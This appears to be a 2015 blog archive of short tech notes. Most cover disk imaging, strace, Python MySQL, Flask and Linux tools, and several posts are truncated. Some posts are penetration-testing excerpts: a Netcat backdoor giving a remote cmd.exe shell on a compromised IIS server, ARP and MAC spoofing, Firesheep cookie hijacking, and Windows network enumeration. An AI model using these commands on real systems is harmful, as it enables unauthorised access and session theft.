Posts

Showing posts from 2015

Backup your hdd to an image

Backup your hdd to an image with following simple command:
dd bs=4096 conv=noerror,sync if=/dev/sdc1 | gzip -c > img.gz Note: Don't save the file in sdc1
To restore backup image:
gunzip -c img.gz | dd of=/dev/sdc1
Verify with the following:
sha1sum imgsha1sum /dev/sdc1

Trace Application in Linux

Using Strace,
Installaions "Fedora":
 dnf install strace Running :
strace -Tttvfs 1024 -o <output_file> <command>

Fortran, C and C++ for Windows

Download from :
http://www.equation.com/servlet/equation.cmd?fa=fortran and install it or extract it to C:\MinWG and if you use winsock.h or winsock2.h, compile it like below.

Compile the Code with : gcc code.c -lws2_32

this help from IRC channel.
<Love4Boobies> Move the -lws2_32 at the very end.

Python MySql

Simple use of MySql Python

mysql> CREATE TABLE pc_data (
    -> pc_id INT NOT NULL AUTO_INCREMENT,
    -> pc_title VARCHAR(100) NOT NULL,
    -> pc_command VARCHAR(100) NOT NULL,
    -> pc_ip VARCHAR(100) NOT NULL,
    -> pc_result VARCHAR(200) NOT NULL,
    -> PRIMARY KEY ( pc_id )
    -> ); cursor.execute("INSERT INTO pc_data ( pc_title, pc_command, pc_ip, pc_result)
                    VALUES ( "PC", "ipconfig", ipaddress, useragent );") 1:

>>import _mysql >>db=_mysql.connect()
>>db=_mysql.connect(host="localhost",user="joebob",passwd="moonpie",db="thangs")
>>db.query("select * from comPc where com_id = 1")
>>r = db.use_result()
>>r.fetch_row()
(('3','2','0'),)
>>r.fetch_row()
()
2:
>>import MySQLdb
>>db=MySQLdb.connect(passwd="moonpie",db="thangs")
>>c=db.cursor()
>>c.execute…

Flask Reqest environ

 request.environ['  set from below   ']
{'wsgi.multiprocess': False,
'HTTP_X_FORWARDED_SERVER': 'freely-openly.rhcloud.com',
'HTTP_X_FORWARDED_HOST': 'freely-openly.rhcloud.com',
'HTTP_X_CLIENT_IP': '00.00.00.00',
'SERVER_SOFTWARE': 'Werkzeug/0.8.3',
'SCRIPT_NAME': '',
'REQUEST_METHOD': 'GET',
'PATH_INFO': '/',
'SERVER_PROTOCOL': 'HTTP/1.1',
'QUERY_STRING': '',
'werkzeug.server.shutdown': <function shutdown_server at 0x7f303c4c6b18>,
'CONTENT_LENGTH': '',
'HTTP_USER_AGENT': 'Mozilla/5.0 (X11; Fedora; Linux i686; rv:41.0) Gecko/20100101 Firefox/41.0',
'HTTP_CONNECTION': 'Keep-Alive',
'SERVER_NAME': '00.00.00.00',
'REMOTE_PORT': 17727,
'wsgi.url_scheme': 'http',
'SERVER_PORT': '8080',
'werkze…

Java for Linux

Java Downloads for Linux https://www.java.com/en/download/linux_manual.jsp
## java ## alternatives --install /usr/bin/java java /usr/java/latest/jre/bin/java 200000
## javaws ## alternatives --install /usr/bin/javaws javaws /usr/java/latest/jre/bin/javaws 200000
## Java Browser (Mozilla) Plugin 32-bit ## alternatives --install /usr/lib/mozilla/plugins/libjavaplugin.so libjavaplugin.so /usr/java/latest/jre/lib/i386/libnpjp2.so 200000
## Java Browser (Mozilla) Plugin 64-bit ## alternatives --install /usr/lib64/mozilla/plugins/libjavaplugin.so libjavaplugin.so.x86_64 /usr/java/latest/jre/lib/amd64/libnpjp2.so 200000
## Install javac only if you installed JDK (Java Development Kit) package ## alternatives --install /usr/bin/javac javac /usr/java/latest/bin/javac 200000 alternatives --install /usr/bin/jar jar /usr/java/latest/bin/jar 200000

Linux and Unix screen command

Installing in Fedora yum install screen Start screen for the first time : mib@itsecur1ty ~ $ screen Show screen parameter : Type “Ctrl-A” and “?” without quotes. Then you will see all commands or parameters on screen.
To get out of the help screen, you can press “space-bar” button or “Enter“. Re-attach the screen : mib@itsecur1ty ~ $ screen -r Use screen -ls to see how many screen are available : mib@itsecur1ty ~ $ screen -ls if you want to restore screen : mib@itsecur1ty ~ $ screen -r "number"Note : Alternatives to GNU Screen for Linux Terminal :Tmux and dvtm dtach.

SSH server freeSSHD

Image
freeSSHd, like it's name says, is a free implementation of an SSH server. It provides strong encryption and authentication over insecure networks like Internet. Users can open remote console or even access their remote files thanks to buit-in SFTP server.

Download : freeSSHd
Tutorial : IBM tutorial

 add User ..


NetCat – The "Swiss Army Knife"

Port scanning with Netcat
A scanning example from Hobbit is "nc -v -w 2 -z target 20-30".

Netcat as a BackDoor
      So now we have Netcat uploaded to the IIS server, we want to use it to create a
backdoor, in order to get a remote command prompt.

In order to act as a backdoor we need Netcat to listen on a chosen port on the IIS
server (lets choose port 10001) and then we can connect to this port from our
attacking machine...using Netcat of course!
The command we want to give on the server looks like this:

nc -L -p 10001 -d -e cmd.exeTransferring files using Netcat
     Let's look at other possibilities Netcat can provide. Sat we wanted to transfer a file
called hack.txt to the IIS server, and for some reason we don't want to TFTP the file.
We can use Netcat to transfer files from one system to another.

To receive a file named hack.txt on the destination system start Netcat on the IIS
server with the following command:

nc –l –p 1234 >hack.txtnc destination 1234 <h…

Windows 7

Windows 7 Home Basic (developing markets only)
Windows 7 Starter
Windows 7 Starter x64
Windows 7 Home Premium
Windows 7 Home Premium (x64)
Windows 7 Home Premium N (European Union only)
Windows 7 Professional
Windows 7 Professional (x64)
Windows 7 Enterprise
Windows 7 Enterprise (x64)
Windows 7 Ultimate
Windows 7 Ultimate (x64)

OEM Versions
One of the biggest secrets in the software world is that Microsoft’s operating systems are
available from online retailers in so-called OEM (“original equipment manufacturer”)
versions (which come in just the Full SKU) that are aimed at the PC builder market. These
are the small “mom and pop”-type PC makers who build hand-crafted machines for local
markets. OEM packaging is bare-bones and does not come with a retail box. Instead, you
get the disc, a Product Key, and a slip of paper describing the product.

OEM versions of Windows 7 differ from retail versions in some important ways:
♦ ♦ They are dramatically cheaper than retail versions.
the OEM versions of Windows 7 …

Block unwanted advertisements with /etc/hosts file on Linux

Now we will make the shell script.
run:

vi /root/update_hosts.sh
Fill the file with the following:

#!/bin/bash
cd /tmp
wget http://winhelp2002.mvps.org/hosts.txt
rm /etc/hosts
mv hosts.txt /etc/hosts
cat ~/.etchosts >> /etc/hosts


Now we have to make sure the script is executable:
chmod +x update_hosts.sh
./update_hosts.sh For Windows check this : http://winhelp2002.mvps.org/

Firefox plugins

Firesheep – Firefox plugin

      Firesheep is a classic Penetration Testing tool used to audit web sessions. 
Firesheep is an extension for the Firefox web browser; however, some versions have been
unstable with recent Firefox releases. Firesheep acts as a packet sniffer that intercepts
unencrypted cookies from websites while they transmit over a network.

Web Developer – Firefox plugin
        Web Developer is an extension for Firefox that adds editing and debugging tools for web developers. 
Web Developer can be downloaded for free from the Firefox plugin store. 
One feature in Web Developer useful for session hijacking is the ability to edit cookies. 
This can be found as a drop-down option from the Firefox browser once Web Developer is installed.

Greasemonkey – Firefox plugin
Greasemonkey is a Firefox plugin that allows users to install scripts that make on the fly changes to web page content before or after the page is loaded. 
Greasemonkey can be used for customizing a web page appearance,…

Getting started with TCPDump

To start off, let's look at the usage specification for TCPDump:

tcpdump [ -AbdDefhHIJKlLnNOpqRStuUvxX ]

[ -B buffer_size ] [ -c count ] [ -C file_size ]

[ -G rotate_seconds ] [ -F file ]

[ -i interface ] [ -j tstamp_type ] [ -m module ] [ -M secret ]

[ -Q in|out|inout ] [ -r file ]

[ -V file ] [ -s snaplen ] [ -T type ] [ -w file ] [ -W filecount ]

[ -E spi@ipaddr algo:secret,... ] [ -y datalinktype ]

[ -z postrotate-command ] [ -Z user ] [ expression ]

Abusing address resolution

The address resolution protocol exists as a service that translates IP addresses
into MAC addresses.
Hosts make ARP requests to obtain information about the MAC address associated with a given IP address.
A host will broadcast a message across the entire local network segment, hoping to receive a response from the host associated with the requested IP address.
The fundamental flaw in the address resolution protocol is that it inherently lacks any form of authentication and message integrity.
This means that, when a response is received for a MAC address lookup, the receiving host has no way of determining its origin, and is left to blindly assume it comes from the correct host. To an attacker, what this means is that you can convince devices to forward you packets that are actually intended for another user by forging responses to ARP requests.
Kali Linux has a tool that helps facilitate ARP abuse; it's called ArpSpoof and following is the usage specification for it:

arpspoof [-ic…

Spoofing MAC addresses

To change your MAC address using Kali Linux, you can use a tool called
macchanger , and use the following command:

macchanger [-hVeaArls] [-m,--mac,--mac= MAC_ADDRESS] INTERFACE

Following is an example of macchanger in action:

ifconfig down eth0
macchanger –-mac=01:02:03:04:05:06 eth0
ifconfig up eth0

Interrogating the Whois servers

whois [IP address]
As an example, here's how you retrieve the Whois record for one of the Google
server addresses:

whois 74.125.233.83

Dumping the NetBIOS Name Table with Nbtstat and Nbtscan

Another great built-in tool is nbtstat, which calls up the NetBIOS Name Table from a
remote system. The Name Table contains a great deal of information, as shown in the
following example:
C:\>nbtstat -A 192.168.202.33
Local Area Connection:
Node IpAddress: [192.168.234.244] Scope Id: []
NetBIOS Remote Machine Name Table
Name            Type         Status
---------------------------------------------
CAESARS  <00> UNIQUE  Registered
VEGAS2   <00> GROUP    Registered
VEGAS2  <1C> GROUP   Registered
CAESARS <20> UNIQUE Registered
VEGAS2 <1B> UNIQUE Registered
VEGAS2 <1E> GROUP   Registered
VEGAS2 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-01-03-27-93-8F
       As illustrated, nbtstat extracts the system name (CAESARS), the domain or workgroup it’s in (VEGAS2), and the Media Access Control (MAC) address.
 These entities can beidentified by their NetBIOS suffixes (the two-digit hexadecimal number to the right of…

Enumerating Domains with Net View

The net view command is a great example of a built-in enumeration tool.
Net view is an extraordinarily simple command-line utility that will list domains available on the network and then lay bare all machines in a domain. Here’s how to enumerate domains
on the network using net view:
C:\>net view /domain DomainThe net view command is a great example of a built-in enumeration tool.
Net view is an extraordinarily simple command-line utility that will list domains available on the network and then lay bare all machines in a domain.
Here’s how to enumerate domains on the network using net view:
C:\>net view /domain
Domain
-----------------------------------------------------------------------
CORLEONE
BARZINI_DOMAIN
TATAGGLIA_DOMAIN
BRAZZI
The command completed successfully. Supplying an argument to the /domain switch will list computers in a particular domain, as shown next:
C:\>net view /domain:corleone For the command-line challenged, the Network Neighborhood shows essentially the …

Configuring the Windows Time Service

To configure Windows time service to use an internal hardware clock, follow these steps:

1. Click Start, click Run, type regedit, and then click OK.

2. Locate and then click on the registry subkey HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters.

3. In the right pane, right-click ReliableTimeSource, and then click Modify.

4. In Edit DWORD Value, type 1 in the Value data box, and then click OK.

5. Locate and then click on the registry subkey HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters.

6. In the right pane, right-click LocalNTP, and then click Modify.

7. In Edit DWORD Value, type 1 in the Value data box, and then click OK.

8. Quit Registry Editor.

9. At the command prompt, run the net stop w32time && net start w32time command to restart the Windows time service.

10. “Run the w32tm -s command on all computers other than the time server to reset the local computer’s time against the time server.”